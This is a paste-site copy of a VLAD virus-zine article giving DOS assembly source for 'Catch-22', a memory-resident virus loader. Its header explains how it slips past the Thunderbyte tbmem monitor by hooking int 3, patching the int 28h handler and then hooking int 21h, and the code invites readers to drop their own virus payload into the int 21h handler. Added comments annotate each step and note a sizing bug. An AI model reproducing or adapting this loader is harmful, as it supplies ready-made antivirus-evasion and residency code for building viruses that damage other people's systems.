FlyFar

VLAD Magazine - Issue #3 - ARTICLE.5_3 - Catch-22 TSR Loader Source Code

Jun 28th, 2023
  1. ; Catch-22, a TSR loader by Rhincewind [Vlad]
  2. ;
  3. ; This is probably the most experimental thing I've done so far. In this
  4. ; loader I've combined a few things I learned about tbmem into a pretty
  5. ; neat loader that the current version of tbmem will not detect.
  6. ;
  7. ; The highloader is pretty straightforward, although it does use one
  8. ; trick I found. It traces the PSP chain all the way back to the command
  9. ; interpreter, then makes that PSP active before a block is allocated for
  10. ; the loader. This so-called 'context switching' will make the newly
  11. ; allocated block property of your command interpreter, ensuring its
  12. ; lasting residency. Down with direct MCB twiddling!
  13. ;
  14. ; Now tbmem comes into play. First, two facts:
  15. ;
  16. ; Fact 1 - Tbmem detects residency on vectorchanges only. It can't be
  17. ;          bothered to look at the memory itself.
  18. ; Fact 2 - Tbmem does not flag on intel reserved registers being hooked.
  19. ;
  20. ; For starters the loader will hook int3, thereby not alerting tbmem as
  21. ; above. The first byte of the int28 handler, which is an IRET in the
  22. ; original handler, will be overwritten
  23. ; with an int3. Now, as you probably know, only the command
  24. ; interpreter calls int28 (Okay, so do Terminate and a handful of other
  25. ; programs, watch out for those) which is redirected to our routine.
  26. ; We managed to get a routine active around tbmem! Hurray! Now, the int3
  27. ; handler will countdown 75 times, 13 is the minimum btw, to make sure
  28. ; that we're back in command mode, that is, out of the dos deallocation
  29. ; routines before we hook int21, which again, will elude tbmem. Both int28
  30. ; and int3 are restored and we're done with our loader.
  31.  
  32.                 .model tiny                ; TASM/MASM-style directives: one segment for code and data (.COM image)
  33.                 .code
  34.                 org 100h                   ; .COM load offset; the resident copy is placed at offset 0, hence the "-100h" fixups on every reference below
  35. parasize        equ (endloader-start)      ; length of the copied image in BYTES; the DOS memory calls below take it in BX, where DOS expects a paragraph count
  36. start:
      ; Installer stage (runs once as a .COM program, then terminates with int 20h).
      ; What it leaves behind, i.e. what an analyst can look for afterwards:
      ;   - a memory block of parasize+1 paragraphs allocated while the command
      ;     interpreter's PSP was the current PSP
      ;   - the int 3 vector (0:000Ch) pointing at install_21 inside that block
      ;   - the first byte of the int 28h handler replaced by 0CCh (int 3); the
      ;     int 28h vector itself is left unchanged
      ; Register roles: ES = segment of the new block after the allocation,
      ; DI = write cursor in that block, DS:SI = read cursor (own code, then the IVT).
  37.                 mov ax, 'TB'                ; residency check: the resident int21 handler below answers AX='TB' with AX='AV'
  38.                 int 21h
  39.                 cmp ax, 'AV'
  40.                 jz exit_tsr                 ; already resident -> terminate without installing again
  41.                 mov ah, 4ah                 ; DOS 4Ah = resize memory block at ES (assumes ES still holds the PSP, as at .COM entry)
  42.                 mov bx,-1                   ; request FFFFh paragraphs: the call fails and DOS returns the largest possible size in BX
  43.                 push ax                     ; keep AH=4Ah across the call, which overwrites AX
  44.                 int 21h
  45.                 pop ax
  46.                 sub bx, parasize+2          ; shrink the program's own block by that amount to leave free memory above it
  47.                 int 21h
  48.                 xor si,si                   ; SI = 0 so DS:[SI+16h] addresses PSP offset 16h (parent PSP segment)
  49. nextpsp:
      ; Walk the parent-PSP chain. The loop ends when a PSP names the segment already
      ; in BX as its parent; per the header comment this is the command interpreter.
  50.                 cmp bx, word ptr ds:[si+16h]
  51.                 mov bx, word ptr ds:[si+16h] ; mov does not change flags, so the jnz below still tests the cmp
  52.                 mov ds,bx
  53.                 jnz nextpsp
  54. found_cmd:
  55.                 mov ah, 50h                 ; DOS 50h = set current PSP to BX (the PSP found above)
  56.                 int 21h
  57.                 mov ah, 48h                 ; DOS 48h = allocate BX paragraphs; the block is made while that PSP is current
  58.                 mov bx,parasize+1
  59.                 int 21h
  60.                 mov es,ax                   ; ES = segment of the new block (AX is used without checking the carry flag)
  61.                 mov ah, 50h                 ; switch the current PSP back to this program (CS = PSP in a .COM)
  62.                 mov bx,cs
  63.                 int 21h
  64.                 push cs
  65.                 pop ds
  66.                 mov si, 100h
  67.                 xor di,di
  68.                 mov cx, endloader-start
  69.                 rep movsb                   ; copy start..endloader to ES:0; DI now addresses intoffset in the new block
  70.                 mov ds,cx                   ; CX is 0 after rep, so DS = 0 (interrupt vector table)
  71.                 mov si, 3*4                 ; IVT entry of int 3
  72.                 movsw                       ; save the current int 3 vector into intoffset/intseg
  73.                 movsw
  74.                 cli                         ; interrupts off while the two vector words are inconsistent
  75.                 mov word ptr [si-4],offset install_21-100h ; SI-4 = 0Ch again: int 3 now points at the resident install_21
  76.                 mov word ptr [si-2],es
  77.                 sti
  78.                 mov si, 28h*4               ; IVT entry of int 28h
  79.                 movsw                       ; save the int 28h handler address into int2offset/int2seg
  80.                 movsw
  81.                 mov ax,75h                  ; counter = 75h, i.e. 117 decimal (the header comment says 75)
  82.                 stosw
  83.                 mov word ptr es:[di],75h    ; DI now addresses orgbyte; the low byte is overwritten by the stosb below
  84.                 lds bx, dword ptr ds:[si-4] ; DS:BX = address of the int 28h handler read back from the IVT
  85.                 mov al, 0cch                ; 0CCh = one-byte int 3 opcode
  86.                 xchg byte ptr ds:[bx],al    ; patch the handler's first byte, AL = byte that was there
  87.                 stosb                       ; orgbyte = original first byte, restored later by install_21
  88.                 ;Restore all registers here, including DS&ES
  89. exit_tsr:                
  90.                 int 20h                     ; terminate; the separately allocated block is not part of this program's own block
  91. install_21:    
      ; Resident int 3 handler. It is entered whenever the 0CCh byte patched into the
      ; int 28h handler executes. It counts calls down and, when counter reaches zero,
      ; undoes both patches and hooks int 21h. After that point the int 3 vector and
      ; the int 28h handler byte are back to their saved values and the only vector
      ; that differs from before is int 21h (0:0084h).
      ; All data references are CS-relative with -100h because the copy lives at offset 0.
  92.                 dec word ptr cs:counter-100h
  93.                 jnz exit_int3               ; not yet zero: behave like the handler's original first instruction
  94.                 push ax
  95.                 push di
  96.                 push ds
  97.                 push es
  98.                 xor ax,ax
  99.                 mov ds,ax                   ; DS = 0 (interrupt vector table)
  100.                 les di, dword ptr cs:int2offset-100h ; ES:DI = saved address of the int 28h handler
  101.                 mov al, byte ptr cs:orgbyte-100h
  102.                 stosb                       ; put the original first byte back over the 0CCh
  103.                 cli                         ; vectors are rewritten with interrupts disabled
  104.                 les di, dword ptr cs:intoffset-100h ; ES:DI = saved original int 3 vector
  105.                 mov word ptr ds:[0ch],di    ; restore int 3 (0:000Ch / 0:000Eh)
  106.                 mov word ptr ds:[0eh],es
  107.                 mov ax,offset int21-100h
  108.                 xchg ax, word ptr ds:[84h]  ; 84h = 21h*4: install the resident int21 offset, AX = previous offset
  109.                 mov cs:intoffset-100h,ax    ; intoffset/intseg are reused to hold the previous int 21h vector
  110.                 mov ax,cs
  111.                 xchg ax, word ptr ds:[86h]  ; same for the segment word
  112.                 mov cs:intseg-100h,ax
  113.                 sti
  114.                 pop es
  115.                 pop ds
  116.                 pop di
  117.                 pop ax
  118. exit_int3:                
  119.                 add sp,6                    ; drop the IP/CS/FLAGS frame pushed by the patched-in int 3
  120.                 iret                        ; return through the int 28h caller's frame, as the IRET the header says originally stood there would
  121. ;Replace the handler below with your k-rad virus code.
      ; Resident int 21h handler as shipped: it only implements the residency check
      ; (AX='TB' -> AX='AV') and passes every other request to the previous handler.
      ; The 'TB'/'AV' exchange is a fixed marker that can be probed to tell whether
      ; this code is resident.
  122. int21:
  123.                 cmp ax,'TB'
  124.                 jnz return_int              ; anything else goes to the previous int 21h handler
  125.                 mov ax, 'AV'                ; reply expected by the check at start
  126.                 iret
  127. return_int:                
  128.                 jmp dword ptr cs:intoffset-100h ; far jump to the vector saved by install_21
  129. endloader:                             ; end of the bytes copied by rep movsb; the fields below are filled in at run time through ES:DI
  130. intoffset      dw ?                    ; saved int 3 vector offset; reused by install_21 for the previous int 21h offset
  131. intseg         dw ?                    ; segment word of the same vector
  132. int2offset     dw ?                    ; offset of the int 28h handler whose first byte is patched
  133. int2seg        dw ?                    ; segment of that handler
  134. counter        dw ?                    ; number of int 3 entries left before install_21 hooks int 21h
  135. orgbyte        db ?                    ; original first byte of the int 28h handler
  136.  
  137.                 end start
Tags: loader vlad TSR